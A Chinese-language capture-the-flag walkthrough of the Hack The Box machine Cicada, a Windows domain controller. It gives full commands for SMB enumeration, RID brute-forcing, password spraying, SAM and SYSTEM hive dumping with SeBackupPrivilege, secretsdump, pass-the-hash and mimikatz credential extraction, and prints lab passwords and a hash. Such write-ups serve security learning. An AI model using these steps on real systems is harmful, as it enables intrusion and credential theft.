本文章仅用于网络安全研究学习,请勿使用相关技术进行违法犯罪活动。
Hack The Box是一个国外的靶机在线平台,实验环境将实时更新,允许您测试您的渗透测试技能。
知识点:smb rid遍历、
kali:10.10.16.3
cicada:10.10.11.35
0001.获取系统权限
使用nmap对靶机进行扫描,根据端口开放情况可以判断是Windows,根据Host script results可以判断开启了smb。
nmap -sC -sV -O -oN nmap.txt 10.10.11.35
# Nmap 7.94SVN scan initiated Mon Sep 30 22:17:34 2024 as: nmap -sC -sV -O -oN nmap.txt 10.10.11.35Nmap scan report for 10.10.11.35 (10.10.11.35)Host is up (0.55s latency).Not shown: 989 filtered tcp ports (no-response)PORT STATE SERVICE VERSION53/tcp open domain Simple DNS Plus88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-01 09:18:25Z)135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)|_ssl-date: TLS randomness does not represent time| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:CICADA-DC.cicada.htb| Not valid before: 2024-08-22T20:24:16|_Not valid after: 2025-08-22T20:24:16445/tcp open microsoft-ds?464/tcp open kpasswd5?593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)|_ssl-date: TLS randomness does not represent time| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:CICADA-DC.cicada.htb| Not valid before: 2024-08-22T20:24:16|_Not valid after: 2025-08-22T20:24:163268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)|_ssl-date: TLS randomness does not represent time| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:CICADA-DC.cicada.htb| Not valid before: 2024-08-22T20:24:16|_Not valid after: 2025-08-22T20:24:163269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:CICADA-DC.cicada.htb| Not valid before: 2024-08-22T20:24:16|_Not valid after: 2025-08-22T20:24:16|_ssl-date: TLS randomness does not represent timeWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portDevice type: general purposeRunning (JUST GUESSING): Microsoft Windows 2022 (88%)Aggressive OS guesses: Microsoft Windows Server 2022 (88%)No exact OS matches for host (test conditions non-ideal).Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:| smb2-security-mode:| 3:1:1:|_ Message signing enabled and required| smb2-time:| date: 2024-10-01T09:19:30|_ start_date: N/A|_clock-skew: 6h59m59s
进入smb查看是否有可用信息,密码为空,可以看到共享的文件夹列表,其中可能有用文件夹的是DEV和HR。
smbclient -L //10.10.11.35
![HTB靶场 Cicada(Windows)[Easy]](http://cn-sec.com/wp-content/uploads/2024/10/7-1728186351.png "HTB靶场 Cicada(Windows)[Easy]")
DEV进入后没有操作权限,在HR里面发现了Notice from HR.txt文件,传输到本地后发现初始默认密码:Cicada$M6Corpb*@Lp#nZp!8
smbclient //10.10.11.35/HRdirget "Notice from HR.txt" cat Notice from HR.txt![HTB靶场 Cicada(Windows)[Easy]](http://cn-sec.com/wp-content/uploads/2024/10/1-1728186352.png "HTB靶场 Cicada(Windows)[Easy]")
有了初始密码,我们通过smb穷举rid收集用户名,
crackmapexec smb 10.10.11.35 -u 'guest' -p '' --rid-brute![HTB靶场 Cicada(Windows)[Easy]](http://cn-sec.com/wp-content/uploads/2024/10/2-1728186353.png "HTB靶场 Cicada(Windows)[Easy]")
前面几行都是系统用户,直接忽略,将后面几行结果保存到users.txt中,使用下列语句筛选用户名保存到usernames.txt中。
grep -oP '(?<=CICADA\).+(?= ()' users.txt > usernames.txt![HTB靶场 Cicada(Windows)[Easy]](http://cn-sec.com/wp-content/uploads/2024/10/6-1728186354.png "HTB靶场 Cicada(Windows)[Easy]")
现在我们有了用户名和密码,尝试遍历,最后在ldap遍历时确认了密码对michael.wrightson用户可用。
crackmapexec ldap cicada.htb -u usernames.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'![HTB靶场 Cicada(Windows)[Easy]](http://cn-sec.com/wp-content/uploads/2024/10/3-1728186355.png "HTB靶场 Cicada(Windows)[Easy]")
再使用得到的用户名密码提取用户信息,得到david.orelious用户的密码aRt$Lp#7t*VQ!3
crackmapexec ldap cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users![HTB靶场 Cicada(Windows)[Easy]](http://cn-sec.com/wp-content/uploads/2024/10/10-1728186357.png "HTB靶场 Cicada(Windows)[Easy]")
经过尝试可以使用david.orelious用户访问smb中的dev文件夹,里面找到Backup_script.ps1文件,打开后得到emily.oscars用户的密码Q!3@Lp#M6b*7t*Vt
smbclient -U david.orelious //10.10.11.35/devdirget Backup_script.ps1cat Backup_script.ps1
![HTB靶场 Cicada(Windows)[Easy]](http://cn-sec.com/wp-content/uploads/2024/10/6-1728186358.png "HTB靶场 Cicada(Windows)[Easy]")
使用evil-winrm远程登录,获取系统权限
evil-winrm -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' -i 10.10.11.35![HTB靶场 Cicada(Windows)[Easy]](http://cn-sec.com/wp-content/uploads/2024/10/7-1728186360.png "HTB靶场 Cicada(Windows)[Easy]")
0002.获取Administrator用户权限
首先查看当前用户拥有的权限,当前用户有特权SeBackupPrivilege。
whoami /all![HTB靶场 Cicada(Windows)[Easy]](http://cn-sec.com/wp-content/uploads/2024/10/5-1728186361.png "HTB靶场 Cicada(Windows)[Easy]")
此特权向用户提供对文件系统的完全读取访问权限,例如SA文件和SYSTEM注册表文件,这两个文件可能破解系统或网络上高权限用户的密码来提权,步骤如下:
a.转存注册表到本地
reg save hklmsam c:Tempsamreg save hklmsystem c:Tempsystemdownload samdownload system
b. 解码
impacket-secretsdump -sam sam -system system local ![HTB靶场 Cicada(Windows)[Easy]](http://cn-sec.com/wp-content/uploads/2024/10/8-1728186362.png "HTB靶场 Cicada(Windows)[Easy]")
使用得到的hash值远程登录,得到Administrator用户权限。
evil-winrm -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341' -i 10.10.11.35![HTB靶场 Cicada(Windows)[Easy]](http://cn-sec.com/wp-content/uploads/2024/10/8-1728186363.png "HTB靶场 Cicada(Windows)[Easy]")
上传mimikatz.exe还可以获取Administrator用户的密码,mimikatz.exe在kali中自带的有/usr/share/windows-resources/mimikatz/x64/mimikatz.exe。
upload mimikatz.exe./mimikatz.exe "sekurlsa::logonpasswords" exit
![HTB靶场 Cicada(Windows)[Easy]](http://cn-sec.com/wp-content/uploads/2024/10/10-1728186365.png "HTB靶场 Cicada(Windows)[Easy]")
感谢观看!
原文始发于微信公众号(Rsec):HTB靶场 Cicada(Windows)[Easy]
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论